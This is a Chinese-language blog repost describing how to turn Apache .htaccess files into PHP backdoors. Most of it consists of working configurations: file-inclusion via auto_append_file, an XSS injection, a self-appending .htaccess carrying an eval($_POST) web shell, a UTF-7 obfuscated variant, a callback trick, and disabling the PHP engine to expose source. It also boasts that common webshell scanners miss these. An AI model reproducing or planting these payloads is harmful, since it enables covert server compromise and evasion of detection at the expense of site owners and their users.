利用.Htaccess文件构成的PHP后门


from:http://www.tiejiang.org/10048.html

0x00 .Htaccess简介

.htaccess 是Apache HTTP Server的文件目录系统级别的配置文件的默认的名字。它提供了在主配置文件中定义用户自定义指令的支持。 这些配置指令需要在 .htaccess 上下文 和用户需要的适当许可。

平时开发用的最多的就是URL重定向功能。

0x01 开启.htaccess

Apache中修改配置文件httpd.conf

修改如下内容

Options FollowSymLinks

AllowOverride None

为:

Options FollowSymLinks

AllowOverride All

开启rewrite模块

LoadModule rewrite_module modules/mod_rewrite.so

后门篇

文件包含

.htaccess:

php_value auto_append_file D:/wamp/www/1.txt

*.php

XSS后门

.htaccess:

php_value highlight.comment '"><script>alert(1);</script>'

*.php

PHP后门

.htaccess:

php_value auto_append_file .htaccess
#<?php eval($_POST[1]);

*.php
.htaccess:

php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"
php_value auto_append_file .htaccess
#+ADw-script+AD4-alert(1)+ADsAPA-/script+AD4 #+ADw?php phpinfo()+Ads

*.php
.htaccess:

php_value unserialize_callback_func "phpinfo"
index.php:
unserialize('O:1:"1":0:{}');

类似的回调函数都是可以的,过此处phpinfo要怎么调用才能运行任意代码还没研究出来。

任意文件下载

.htaccess:

php_flag engine 0

*.php

0x03 webshell查杀

目前使用了D盾webshell查杀、SeayFindShell等工具对这个都没有查杀效果。不过也都是一些简单的一句话木马了,很容易被入库干掉。自己写了一个伪装成mysql调试文件的PHP木马,感觉好用多了。


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM